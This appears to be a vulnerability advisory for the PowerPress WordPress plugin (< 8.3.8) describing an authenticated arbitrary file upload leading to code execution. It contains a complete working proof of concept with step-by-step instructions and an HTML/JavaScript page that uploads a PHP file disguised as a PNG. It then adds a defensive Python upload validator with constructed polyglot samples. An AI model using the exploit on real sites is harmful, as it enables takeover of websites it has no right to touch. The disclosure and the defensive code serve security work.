wpexploit / minhtuanact / WPEX-ID: 43AA30BF-EAF8-467A-93A1-78F9BDB37B36
History: Oct 11, 2020 - 12:00 a.m.

PowerPress < 8.3.8 - Authenticated Arbitrary File Upload leading to RCE

Date: 2020-10-11 00:00:00
Author: minhtuanact
390
Tags: powerpress, arbitrary file upload, rce, html, xss, admin, nonce

EPSS: 0.001 (Percentile: 44.4%)

The plugin did not verify some of the uploaded feed images (such as the ones from the Podcast Artwork section), allowing high-privilege accounts (admin+) to upload arbitrary files, such as PHP scripts, leading to RCE.

https://drive.google.com/file/d/1fyf6blzeG3VX22BQX7hc1QJ20rCY5p43/view?usp=sharing

- Save the HTML code below in an HTML file
- Replace <BLOG> with the blog's hostname
- Log in to the blog as admin, go to Blubrry PowerPress Settings > Feeds and get the nonce from the page source (look for "_wpnonce"), then replace <NONCE> with its value in the saved code
- Open the saved HTML file with the same browser used to log in to the blog, and click 'Submit request'
- Then open <BLOG>/wp-content/uploads/powerpress/up.php in the browser
 
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/<BLOG>\/wp-admin\/admin.php?page=powerpressadmin_basic", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary5Ac7Ayyi2qVtiLqA");
        xhr.withCredentials = true;
        var body = "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + 
          "\r\n" + 
          "<NONCE>\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "powerpress-save-settings\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"Feed[rss2_image]\"\r\n" + 
          "\r\n" + 
          "aa.png\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"rss2_image_checkbox\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA\r\n" + 
          "Content-Disposition: form-data; name=\"rss2_image_file\"; filename=\"up.php\"\r\n" + 
          "Content-Type: image/png\r\n" + 
          "\r\n" + 
          "\x89PNG\r\n" + 
          "\x1a\n" + 
          "\x3c?php phpinfo(); ?\x3e\r\n" + 
          "------WebKitFormBoundary5Ac7Ayyi2qVtiLqA--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
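The weakness the PoC exercises is that the feed-image upload was stored without any check of the filename or the file content. The Python below is an added example, not code from this WPScan entry or from the PowerPress plugin, of the validation an upload handler should apply before writing a feed image to disk: an extension allowlist, a structural parse of the image bytes (chunk lengths and CRCs for PNG, start/end markers for JPEG and GIF), and a refusal of any file carrying a PHP open tag. A PHP script prefixed with the eight-byte PNG signature, which is exactly what the PoC sends as rss2_image_file, passes a naive magic-byte sniff but fails the structural check. All function names, sample filenames and sample files are constructed for this example.

```python
# Added example (not code from the WPScan entry or the PowerPress plugin):
# a defensive validator for feed-image uploads of the kind the advisory says
# PowerPress < 8.3.8 did not check. Sample inputs are constructed inline.
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}


def _extension(filename):
    """Lower-cased final extension of the basename ('' if there is none)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def _png_chunk(ctype, body):
    """Serialise one PNG chunk: length, type, data, CRC-32 over type+data."""
    return (struct.pack(">I", len(body)) + ctype + body
            + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF))


def png_is_well_formed(data):
    """Walk the chunk list: IHDR first, every CRC valid, IEND last and at EOF."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    seen_ihdr = False
    while pos + 12 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        if len(body) != length:          # truncated file or bogus length field
            return False
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return False
        if not seen_ihdr:
            if ctype != b"IHDR" or length != 13:
                return False
            seen_ihdr = True
        pos += 12 + length
        if ctype == b"IEND":
            return pos == len(data)      # nothing may trail the IEND chunk
    return False


def validate_feed_image(filename, data):
    """Return (accepted, reason) for a candidate feed-image upload."""
    ext = _extension(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension %r is not an allowed image type" % ext
    if ext == "png":
        ok = png_is_well_formed(data)
    elif ext in ("jpg", "jpeg"):
        ok = data.startswith(b"\xff\xd8\xff") and data.endswith(b"\xff\xd9")
    else:  # gif
        ok = data[:6] in (b"GIF87a", b"GIF89a") and data.endswith(b";")
    if not ok:
        return False, "content is not a well-formed %s image" % ext
    # Defence in depth: a structurally valid image can still carry a PHP
    # payload in metadata (e.g. a PNG tEXt chunk); refuse it outright.
    if b"<?php" in data:
        return False, "PHP open tag embedded in image data"
    return True, "ok"


def make_png(extra_chunks=()):
    """Constructed 1x1 RGB PNG, optionally with extra chunks before IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one RGB pixel
    chunks = [_png_chunk(b"IHDR", ihdr), _png_chunk(b"IDAT", idat)]
    chunks += [_png_chunk(t, b) for t, b in extra_chunks]
    chunks.append(_png_chunk(b"IEND", b""))
    return PNG_SIGNATURE + b"".join(chunks)


# Constructed samples: what the PoC sends, plus variants a validator must catch.
POLYGLOT_PHP = PNG_SIGNATURE + b"<?php phpinfo(); ?>"
SAMPLES = {
    "up.php": POLYGLOT_PHP,                                     # the PoC upload
    "aa.png": POLYGLOT_PHP,                                     # same bytes, image name
    "art.png": make_png(),                                      # genuine image
    "meta.png": make_png([(b"tEXt", b"Comment\x00<?php ?>")]),  # payload in tEXt
}


def audit(samples):
    """Map filename -> rejection reason for every sample that fails."""
    rejected = {}
    for name, data in samples.items():
        accepted, reason = validate_feed_image(name, data)
        if not accepted:
            rejected[name] = reason
    return rejected


if __name__ == "__main__":
    for name, reason in audit(SAMPLES).items():
        print("%-9s rejected: %s" % (name, reason))
```

Inside a WordPress plugin the equivalent first step is to run the upload through wp_check_filetype_and_ext(), which compares the declared extension against the sniffed MIME type; the structural parse and the open-tag scan above are the extra layers that stop a polyglot whose first bytes happen to look like an image. The entry does not describe what PowerPress 8.3.8 itself changed, so the checks here are the generic ones, not the vendor's fix.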

